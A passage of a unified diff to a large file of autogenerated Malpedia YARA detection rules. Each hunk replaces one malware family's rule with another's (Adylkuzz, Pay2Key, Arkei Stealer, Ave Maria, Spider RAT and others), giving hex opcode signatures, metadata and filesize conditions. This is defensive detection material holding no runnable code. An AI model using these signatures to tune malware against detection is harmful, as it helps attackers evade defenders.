-		$sequence_3 = { 55 56 57 6a2a 5f 6a3f 5b }
-		$sequence_4 = { 7410 6a3f 5a 663bfa }
-		$sequence_5 = { 5e 5d c20c00 51 51 53 55 }
-		$sequence_6 = { ff760c ffd0 8b442408 5e c20400 }
-		$sequence_7 = { 897c2414 5d eb16 0fb730 }
-		$sequence_8 = { 83c414 5b 5d c3 8b45f0 8b0c850440a500 8b55f8 }
-		$sequence_9 = { c7424004000000 c7424458270000 c7424800100100 8b7de4 c787cc00000000000000 c787c800000000000000 8945dc }
-		$sequence_10 = { 8955dc e8???????? 8d0de830a500 890424 894c2404 e8???????? }
-		$sequence_11 = { 8d155e30a500 83ec04 891424 8945e8 }
-		$sequence_12 = { 55 89e5 8d055a23a500 5d c3 }
-		$sequence_13 = { 891424 894c2404 8945f8 e8???????? 8d0d4430a500 31d2 890c24 }
-		$sequence_14 = { 56 57 53 83ec54 8d055a23a500 }
-		$sequence_15 = { 890424 894c2404 e8???????? 8d0d4430a500 31d2 8b75f8 89462c }
+		$sequence_0 = { c7459408020000 837f1410 c7459810660000 c7459c20000000 7202 8b3f 0f1007 }
+		$sequence_1 = { bf20000000 0f1f00 84db 7574 ff75fc 57 ff75f8 }
+		$sequence_2 = { 0f4345d0 51 50 8d45e8 50 ff15???????? 837de410 }
+		$sequence_3 = { 83c404 3dff000000 7607 b8ff000000 eb09 83c0ff 0f886f000000 }
+		$sequence_4 = { 8b4dcc 8b45d0 030e 83c018 8b75d4 8b55c0 46 }
+		$sequence_5 = { 0bc8 51 e8???????? 8bcf 83c404 47 8bf0 }
+		$sequence_6 = { 8b4e08 b8ffffff07 2bca 47 c1f905 8bd1 d1ea }
+		$sequence_7 = { c78524fdffff00000000 c78528fdffff0f000000 c68514fdffff00 898d2cfdffff 8a08 40 84c9 }
+		$sequence_8 = { 51 8b4df0 e8???????? 83c410 83f8ff 750e 8d4510 }
+		$sequence_9 = { e8???????? 83c408 33c0 c745ac00000000 6689459c 8b45e8 c745b007000000 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 2343936
 }
-rule MALPEDIA_Win_Adylkuzz_Auto : FILE
+rule MALPEDIA_Win_Metadatabin_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4eb10972-cae7-59fc-a870-eebdff70e8df"
+		id = "bab038c8-9529-5be3-bcc9-7d10f8fe61a6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.adylkuzz_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.metadatabin"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.metadatabin_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "de5f91809dc8ef12371c16bfe87d826bfdd622a4d5fefa4fc686464cb89ee65c"
+		logic_hash = "407d015151f744f5ae0365f6bb52601cc8c31860d073c726bc5069058743c3e0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111089,32 +111181,32 @@ rule MALPEDIA_Win_Adylkuzz_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1c002 3bec f5 33d8 03f8 e9???????? 668b442500 }
-		$sequence_1 = { e8???????? 8b35???????? b9???????? 89d8 8b7b08 89f2 e8???????? }
-		$sequence_2 = { f8 81c508000000 f5 f9 8901 660fc1c0 81ee04000000 }
-		$sequence_3 = { f6c32d 3bce d2e8 6689442504 0fbfc2 660fb6c5 0fc8 }
-		$sequence_4 = { f7d8 33d8 663bd2 f5 03f8 ffe7 660fb6442500 }
-		$sequence_5 = { c7042400000000 b90b000000 89fa 89d8 e8???????? 85c0 7482 }
-		$sequence_6 = { df6c2428 eb77 837c241c08 0f8595020000 f744242000008000 7504 df2e }
-		$sequence_7 = { f7d0 8b06 f5 6685fb 33c3 f9 663bf0 }
-		$sequence_8 = { 8b5034 39d1 0f47ca f6c740 7408 8b5038 39d1 }
-		$sequence_9 = { e8???????? 8b5e08 83fb03 7518 8b16 b9fbffffff 89e8 }
+		$sequence_0 = { 8d9424b8000000 e8???????? 83bc248800000005 0f848d010000 f20f108c2498000000 f20f108424a0000000 f20f10942488000000 }
+		$sequence_1 = { c745e4c0834000 894dd0 8d4dc0 c745d402000000 89c2 897de8 8975ec }
+		$sequence_2 = { b911000000 89df f3a5 f20f108c2474050000 f20f1094246c050000 f20f1084247c050000 f20f118c24b8030000 }
+		$sequence_3 = { b001 84c9 0f859cfeffff 8b461c 6a01 68???????? ff7618 }
+		$sequence_4 = { 8b470c 83780400 7421 8b5f08 83780809 7308 e8???????? }
+		$sequence_5 = { ff76fc e9???????? 0fb64e2c 85c9 0f84a2000000 83f903 0f84b2000000 }
+		$sequence_6 = { e8???????? 0f0b 660f1f840000000000 55 89e5 83ec08 8b4508 }
+		$sequence_7 = { 8a4220 0f1002 8b4a10 8b5214 8845dc 8d45e0 0f1145bc }
+		$sequence_8 = { c68424010c000000 c78424c00b00003e000000 c68424020c000000 c78424c00b00003f000000 c68424030c000000 c78424c00b000040000000 8db424c00b0000 }
+		$sequence_9 = { 89de 8b9c24a0020000 135c2478 13542424 138424a0000000 03bc2430010000 135c2414 }
 
 	condition:
-		7 of them and filesize < 6438912
+		7 of them and filesize < 1263616
 }
-rule MALPEDIA_Win_Pay2Key_Auto : FILE
+rule MALPEDIA_Win_Darkmegi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8e07d004-8ab0-5ac0-b5f3-02a0577c17ab"
+		id = "e022205f-532d-5998-8adc-7461a155f6b2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pay2key"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pay2key_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkmegi_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "bffaa691493d14e2f3352a01cee177c0e343912969f9938647f417173ef48232"
+		logic_hash = "186562bccca029dc0a54ad2573032322c99b928af1a23f4cf752d54c2cfd880f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111128,32 +111220,32 @@ rule MALPEDIA_Win_Pay2Key_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c707???????? 5f 5e 8be5 5d c3 c6470400 }
-		$sequence_1 = { 0f8412000000 83a50ce6fffffe 8b8dfce5ffff e9???????? c3 }
-		$sequence_2 = { c60000 8d4540 6a00 50 e8???????? 83ec18 c645fc05 }
-		$sequence_3 = { 8bce ff5004 8b45f0 8b4d0c 8907 8b4514 895f04 }
-		$sequence_4 = { 8d4e34 c645fc09 c741140f000000 c7411000000000 83791410 7204 8b01 }
-		$sequence_5 = { 8db758030000 8b4614 83f808 720b 40 8bce 50 }
-		$sequence_6 = { c7411000000000 8b4114 894754 c7411400000000 8b5d10 c745fc00000000 8b0b }
-		$sequence_7 = { c745fc01000000 8b4de0 85c9 7414 8b01 8b4010 ffd0 }
-		$sequence_8 = { 8886b2000000 c686b300000001 c7411407000000 c7411000000000 83791408 7204 8b01 }
-		$sequence_9 = { c645fc01 8d45a8 6a00 50 8d4dd8 c745ec0f000000 c745e800000000 }
+		$sequence_0 = { 33f6 6804010000 50 56 ff15???????? 8d8c2488090000 }
+		$sequence_1 = { 3bd9 7cd2 8806 5f 5e 5d 5b }
+		$sequence_2 = { 57 8b7c2414 57 e8???????? 8b542414 83c404 8d4c2408 }
+		$sequence_3 = { 8d0440 8b8c8420010000 c6040a00 8b442410 }
+		$sequence_4 = { f2ae 8bcd 4f c1e902 f3a5 8b842464020000 }
+		$sequence_5 = { 85c0 0f849f000000 8dbc246c020000 83c9ff 33c0 }
+		$sequence_6 = { 8d04c0 8b0c8d40a7b402 f644810401 8d0481 7403 8b00 }
+		$sequence_7 = { 5d 5b c3 8b542414 5f 5e 5d }
+		$sequence_8 = { 8bac24a8020000 53 66ab aa }
+		$sequence_9 = { 3bf8 0f8d43010000 8d4c2414 8d942498030000 51 }
 
 	condition:
-		7 of them and filesize < 2252800
+		7 of them and filesize < 90304
 }
-rule MALPEDIA_Win_Astralocker_Auto : FILE
+rule MALPEDIA_Win_Arkei_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "61f3cae7-a5fe-5b6d-bea1-61609c1203ae"
+		id = "1f91473e-0f59-5d43-b31c-36e662e7cb73"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.astralocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.astralocker_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.arkei_stealer_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "b238aeedb1c86d89326b9be21dc83bdad9113ec500a78f62720bc92f0fb68cd1"
+		logic_hash = "ce62b8dc4f39a6203176e1a77c002f4403d000ee3dbdbb3ae02c853f65ed371e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111167,32 +111259,32 @@ rule MALPEDIA_Win_Astralocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33d2 33f6 891401 89740104 b808000000 6bc800 8b5508 }
-		$sequence_1 = { 51 8b14d0 52 e8???????? 83c408 8945f4 8955f8 }
-		$sequence_2 = { 891401 89740104 b808000000 6bc800 }
-		$sequence_3 = { 891401 89740104 b808000000 6bc800 8b5508 8b440a04 }
-		$sequence_4 = { 8955f0 ba08000000 6bf200 8b45ec }
-		$sequence_5 = { ba08000000 6bf200 8b45ec 8b55f0 b11a }
-		$sequence_6 = { 6bc80a 8b5508 33c0 33f6 89040a }
-		$sequence_7 = { 6bc20a 8b4d08 33d2 33f6 891401 89740104 }
-		$sequence_8 = { 8b5508 8b440a04 50 8b0c0a 51 e8???????? }
-		$sequence_9 = { 8b4508 8b4cd004 51 8b14d0 52 e8???????? 83c408 }
+		$sequence_0 = { 0f849ffeffff ba424d0000 668955ec 8b4620 8b0e 8d1481 }
+		$sequence_1 = { 57 57 68000000c0 68???????? ff15???????? 8bf8 }
+		$sequence_2 = { 52 57 8945f6 ff15???????? 85c0 0f8458feffff 8b4e20 }
+		$sequence_3 = { 6689460c 668b4dd6 66894e0e 6683fb18 }
+		$sequence_4 = { ff15???????? 85c0 74be 8b45e0 }
+		$sequence_5 = { 8d55ec 52 57 8945f6 }
+		$sequence_6 = { 895608 668b45d4 6689460c 668b4dd6 66894e0e }
+		$sequence_7 = { 8b16 8d448a0e 6a00 8d4de4 51 6a0e }
+		$sequence_8 = { 74be 8b45e0 8d55c4 52 6a18 50 }
+		$sequence_9 = { 57 8945e8 ffd3 6a0a 57 8bf0 }
 
 	condition:
-		7 of them and filesize < 191488
+		7 of them and filesize < 1744896
 }
-rule MALPEDIA_Win_Datper_Auto : FILE
+rule MALPEDIA_Win_Unidentified_112_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "41e2fa7a-5eff-5187-bc28-c757ee1b0d1c"
+		id = "088f625c-ef85-5039-b4a6-57af0a7b0b6b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.datper_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_112"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_112_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "d82b0dc20d83d1add855bab184abefd8ce45a5aa4fc977d43e37a534a15fd25f"
+		logic_hash = "fc462a31ea1db66fb5cf9697b2cccafd272c6a5cfa6825d7930166b5fbdba921"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111206,32 +111298,32 @@ rule MALPEDIA_Win_Datper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c64428ff21 45 4b 75ee 81c4a0000000 5d 5f }
-		$sequence_1 = { 8d8580feffff e8???????? c78588feffff04000000 33c0 }
-		$sequence_2 = { 41 46 4a 85d2 75e8 5f 5e }
-		$sequence_3 = { 8b03 e8???????? 8b95d8efffff b8???????? e8???????? }
-		$sequence_4 = { e8???????? 8d8500f0ffff 33c9 ba00100000 e8???????? }
-		$sequence_5 = { bf14000000 8d95c4d7ffff 8bcf a1???????? e8???????? }
-		$sequence_6 = { c78568d7ffff0c000000 33c0 89856cd7ffff c78570d7ffffffffffff 6a00 6a01 8d8568d7ffff }
-		$sequence_7 = { b805000000 e8???????? 83c003 8bd8 85db 7e29 b81a000000 }
-		$sequence_8 = { 8945f8 8d45fc ba00280000 e8???????? 8b4508 }
-		$sequence_9 = { 030424 13542404 83c408 0fb600 }
+		$sequence_0 = { 53 4883ec38 488daa80000000 48817d70ff7f0000 762e c6858f00000000 c6858e00000000 }
+		$sequence_1 = { e8???????? 84c0 0f8496000000 b12c e8???????? 84c0 0f8487000000 }
+		$sequence_2 = { 498d4850 498b5040 4d8b4048 ff5010 4883bde001000000 7525 488b85d8020000 }
+		$sequence_3 = { e8???????? 498b4e50 ba50000000 41b808000000 e8???????? 488b45f0 49894650 }
+		$sequence_4 = { c1ea13 448d0c12 478d0c89 4429c8 0c30 8841ff 48ffc9 }
+		$sequence_5 = { e8???????? 84c0 0f841bf5ffff 488b05???????? 488b08 488b4138 4885c0 }
+		$sequence_6 = { 56 57 53 4883ec28 488daa80000000 488b8d48100000 488bb550100000 }
+		$sequence_7 = { c685de01000000 488d8d50010000 e8???????? eb71 488b8550010000 488b8d58010000 488b9560010000 }
+		$sequence_8 = { ba22000000 e8???????? e9???????? c685e305000001 488d0d4bd01500 4c8d053cd31500 ba22000000 }
+		$sequence_9 = { eb56 31f6 4989dd bf03000000 eb4a 0fb7ca 25ff030000 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 7317504
 }
-rule MALPEDIA_Win_Entryshell_Auto : FILE
+rule MALPEDIA_Win_Socksbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6aaf8e64-ed2e-5afd-ab35-8772e849151b"
+		id = "faec2b10-b495-5749-b587-f624aaef83b1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.entryshell"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.entryshell_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.socksbot_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "00133e95c431c2a3dcea85bea219e4bd4bbb96106a72aed7e1fb3e93342dd945"
+		logic_hash = "369cd58dedba09e8aa40e9db282016f7a46ee224d612c8da35e03725828fb9df"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111245,32 +111337,32 @@ rule MALPEDIA_Win_Entryshell_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 43 895de4 8b049578512501 8945ec 897df0 8a543828 8855ff }
-		$sequence_1 = { 5d c3 8d4301 57 50 e8???????? 83c404 }
-		$sequence_2 = { 6800020000 8d85f8fdffff 50 ff36 ffd3 85c0 0f855fffffff }
-		$sequence_3 = { 6a10 e8???????? 6a40 6a00 8d45a4 50 e8???????? }
-		$sequence_4 = { 83c202 6685c0 75f5 8b8df8dfffff 2bd6 83c1fe }
-		$sequence_5 = { 60 33d2 8b55f4 33c0 8d05e4382501 33c9 8b0c90 }
-		$sequence_6 = { 0101 8d22 0131 8d22 015e8d 2201 8e8d2201558b }
-		$sequence_7 = { c705????????00400000 33c0 c3 6a08 68???????? e8???????? 833d????????01 }
-		$sequence_8 = { 8bf2 ff15???????? 85c0 7523 68???????? ff15???????? }
-		$sequence_9 = { 50 e8???????? 83c414 8d85f8f7ffff 6a00 6a00 6aff }
+		$sequence_0 = { 6a0d 50 8945fc e8???????? 8bf8 }
+		$sequence_1 = { 8d85acfeffff 50 51 c785acfeffff01000000 899db0feffff 894df0 c745f400879303 }
+		$sequence_2 = { 33c0 5f c9 c20400 55 8bec 81ec0c030000 }
+		$sequence_3 = { 324415bc 320439 32c3 880439 }
+		$sequence_4 = { 33c1 c1e002 33c1 c1e002 }
+		$sequence_5 = { c3 8b400c 8b00 ff30 ff15???????? 85c0 74eb }
+		$sequence_6 = { 03f3 eb6d 8b460c 03c3 }
+		$sequence_7 = { 8b55f8 43 8802 8b35???????? 33c0 3bdf }
+		$sequence_8 = { 880e 4a 75f7 5f 5e 5d c3 }
+		$sequence_9 = { a3???????? c605????????00 5b c9 c3 }
 
 	condition:
-		7 of them and filesize < 663552
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Elf_Hideandseek_Auto : FILE
+rule MALPEDIA_Win_Webc2_Adspace_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "10c8f40f-fa57-553f-afa8-26796ff221f6"
+		id = "58de5ec4-0318-51d8-b594-608e74c6b19b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/elf.hideandseek_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_adspace_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "768ba339bd4afb32724f528de613e471a16c477a1e04b8333f9c4f37161d943f"
+		logic_hash = "a92489c81a6d8e641c169a9deed543e2e8352f876cddeafa8d67d22e27f031a4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111284,32 +111376,32 @@ rule MALPEDIA_Elf_Hideandseek_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 740d 83ec0c ff36 e8???????? 83c410 56 56 }
-		$sequence_1 = { e8???????? eb09 83ec0c 56 e8???????? 83c410 f7df }
-		$sequence_2 = { 89c7 85c0 0f8947040000 e9???????? 83be4c01000018 0f87f7040000 8b864c010000 }
-		$sequence_3 = { 84d2 7410 8a53ff 8d43ff 3a542403 7404 84d2 }
-		$sequence_4 = { e8???????? 8b35???????? 83c410 8d78f0 eb45 8b442410 31d2 }
-		$sequence_5 = { 31f6 8b5c240c 803d????????00 7532 e8???????? 88c2 89c1 }
-		$sequence_6 = { b801000000 83c410 c684331001000000 c7864c0100000b000000 c7863801000000000000 eb09 b803000000 }
-		$sequence_7 = { e8???????? c7874801000004000000 58 5a 8d84243a010000 50 8d8710010000 }
-		$sequence_8 = { c1e806 f7d0 83e001 c3 31c0 c3 8b4c2404 }
-		$sequence_9 = { 5a 85c0 59 0f8f1dffffff 50 8b442454 }
+		$sequence_0 = { 33c0 8d7c241d c744241400010000 f3ab }
+		$sequence_1 = { e8???????? 8b4c2420 2bc7 03c1 50 89442424 }
+		$sequence_2 = { e8???????? 8365fc00 57 56 8d4dec }
+		$sequence_3 = { 50 ff15???????? ff742410 e8???????? 56 e8???????? 55 }
+		$sequence_4 = { 50 89442438 e8???????? ff742438 ff15???????? 69c060ea0000 83c42c }
+		$sequence_5 = { 85c0 7408 c744241001000000 bf???????? }
+		$sequence_6 = { 83c40c 8bf8 8d45fc 50 a1???????? 40 50 }
+		$sequence_7 = { b8???????? e8???????? 81ec08010000 53 56 8b1d???????? 57 }
+		$sequence_8 = { ffd6 b8???????? 5e 5b c9 }
+		$sequence_9 = { 83c418 8d85ecfeffff 68???????? 50 ff15???????? 85c0 a3???????? }
 
 	condition:
-		7 of them and filesize < 196608
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Topinambour_Auto : FILE
+rule MALPEDIA_Win_Spider_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "248239f8-95b8-583c-8553-e48d7a46283a"
+		id = "5c1d0a0a-c7b7-560c-afbd-cff397912aa2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.topinambour"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.topinambour_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spider_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spider_rat_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "3b116af57ab25dd36210660cdcf34a024e37c1d655144c3fd22d92727ae67613"
+		logic_hash = "91b51e3f34e8589c66f7bc8774754ce78933dd5fa4cfa89093817c8c758e1ad5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111323,32 +111415,32 @@ rule MALPEDIA_Win_Topinambour_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2b1d 09 1106 1107 }
-		$sequence_1 = { 02 282100000a 6f2200000a 25 6f1d00000a 16 6f2300000a }
-		$sequence_2 = { 1105 8d0f000001 1306 16 1307 }
-		$sequence_3 = { 6f1d00000a 7245000070 6f2000000a 25 6f1d00000a 7255000070 02 }
-		$sequence_4 = { 20204e0000 6f0c00000a 09 2060ea0000 6f0d00000a }
-		$sequence_5 = { 25 721d000070 6f0500000a 25 }
-		$sequence_6 = { 730900000a 0c 6f0a00000a 17 1c 730b00000a }
-		$sequence_7 = { 25 6f1d00000a 7255000070 02 282100000a }
-		$sequence_8 = { 2e06 731000000a 7a 1104 16 }
-		$sequence_9 = { 6f1400000a 2802000006 1308 281300000a 1108 6f1500000a }
+		$sequence_0 = { 493bce 7415 488b01 4d8bc5 ba01000000 ff5020 8bd8 }
+		$sequence_1 = { 833903 b801000000 756e 397104 7569 488b4908 4885c9 }
+		$sequence_2 = { e8???????? cc 488d88c0000000 488d15b2f7ffff e8???????? 8bce 483bc6 }
+		$sequence_3 = { 7433 488bc8 833904 7517 44396104 7511 }
+		$sequence_4 = { 4c8be8 c64424305c 41b901000000 4983c8ff 488d542430 488bce e8???????? }
+		$sequence_5 = { 0fb601 8807 48ffc1 48ffc7 84c0 75f1 49837d2010 }
+		$sequence_6 = { 4883ec20 488d05df860200 488bf9 488901 4883c118 e8???????? 488b5718 }
+		$sequence_7 = { 488b4c2440 488d542478 488b01 ff5018 413bc6 8bd8 0f8c4c010000 }
+		$sequence_8 = { b890900100 e8???????? 482be0 48c7442448feffffff 488b05???????? 4833c4 4889842480900100 }
+		$sequence_9 = { 664489442420 4533c9 4c8d05322a0200 418b9424f0000000 ff5030 488b8c2420010000 488b01 }
 
 	condition:
-		7 of them and filesize < 50176
+		7 of them and filesize < 1107968
 }
-rule MALPEDIA_Win_Ave_Maria_Auto : FILE
+rule MALPEDIA_Win_Woodyrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "87720f7c-76f1-51d7-aae1-49bd8d947af2"
+		id = "ff2403f4-80f5-5a92-a716-69463c81a517"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ave_maria_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.woodyrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.woodyrat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "084747828755c63e5e35ddf08ea97436090c1d46b402b58bfe29209faf23a08b"
+		logic_hash = "0875a91df86b2a6e691c8414a33ce11802859bc8c34fd58e245e57021b392621"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111362,32 +111454,32 @@ rule MALPEDIA_Win_Ave_Maria_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 33c9 85c0 0f94c1 8bc1 c3 }
-		$sequence_1 = { 8a5716 f6d2 80e201 5f 5e 8ac2 5b }
-		$sequence_2 = { 50 e8???????? 8b37 8bcf e8???????? 50 56 }
-		$sequence_3 = { e8???????? 8d4de8 e8???????? 8b4508 5e c9 c20400 }
-		$sequence_4 = { 8bf0 ba???????? 51 8bce e8???????? ba???????? }
-		$sequence_5 = { 740a 8b45f0 8906 33c0 40 eb02 33c0 }
-		$sequence_6 = { 56 8bf1 ff15???????? 8d8ed8010000 e8???????? 8d4e30 e8???????? }
-		$sequence_7 = { 0f84e0000000 51 ba???????? 8bc8 e8???????? 8b4e10 ba???????? }
-		$sequence_8 = { 8d44240c 56 57 8b7d08 6a00 ff7708 }
-		$sequence_9 = { 03d1 c1cf02 8b4df0 03d3 334dac 8bc7 }
+		$sequence_0 = { e8???????? c745fcffffffff 83c404 8b4db0 8bf8 85c9 7411 }
+		$sequence_1 = { c7473400000000 c7473800000000 0f104624 0f114724 f30f7e4634 660fd64734 66894624 }
+		$sequence_2 = { 2bc1 c1f803 69f0abaaaaaa b8aaaaaa0a 8bce d1e9 2bc1 }
+		$sequence_3 = { 0f57c0 c707???????? 0f43c8 660fd64704 8d4704 c745a800000000 50 }
+		$sequence_4 = { ff15???????? 0f57c0 c78558ecffff00000000 660fd68550ecffff 6800010000 c78554ecffff20000000 c78558ecffff00010000 }
+		$sequence_5 = { 0f114630 e9???????? 8bc1 b9feffff7f 83c807 3dfeffff7f 0f47c1 }
+		$sequence_6 = { 7409 50 e8???????? 83c404 837dd000 8b45cc 7704 }
+		$sequence_7 = { 40 894dc8 50 ff75e0 51 e8???????? 8b45c0 }
+		$sequence_8 = { 50 8d8de4f9ffff e8???????? 8bbd10f9ffff 8d8dd8f9ffff 8b7f08 89bd10f9ffff }
+		$sequence_9 = { 899d44ffffff 50 52 c78540ffffff00000000 ff15???????? 6898000000 8d8558ffffff }
 
 	condition:
-		7 of them and filesize < 237568
+		7 of them and filesize < 785408
 }
-rule MALPEDIA_Win_Enigma_Loader_Auto : FILE
+rule MALPEDIA_Win_Micrass_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cc26267d-179f-5094-a193-17b8c695e45b"
+		id = "a229f115-b5ac-5aa3-9ddb-ec5c8630e70f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.enigma_loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.enigma_loader_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.micrass_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "3dcf8ded19af004c0de0e4efb8fdefb86f8c4578eb04199c475e4c233dfc8212"
+		logic_hash = "639446b0255ff71a4b5f82ebea10985e5191c147bc877240c832d8560fe4064d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111401,32 +111493,32 @@ rule MALPEDIA_Win_Enigma_Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d4da0 e8???????? 90 488d15acf80200 488bc8 e8???????? 0f1000 }
-		$sequence_1 = { 493bc1 0f84d9010000 4c8d4001 4c89442430 488b4910 482b0a 48c1f904 }
-		$sequence_2 = { 482b01 49b8ffffffffffffff1f 48c1fd03 4c8bfa 48c1f803 488bf9 }
-		$sequence_3 = { 488d15fb560300 488d4c2420 e8???????? cc 4053 4883ec20 488bd9 }
-		$sequence_4 = { e8???????? 90 c6462801 40387e29 0f85b6050000 bb00100000 488b542448 }
-		$sequence_5 = { 0f28c6 e8???????? 6685c0 0f8f40080000 498d4e20 488d9508020000 e8???????? }
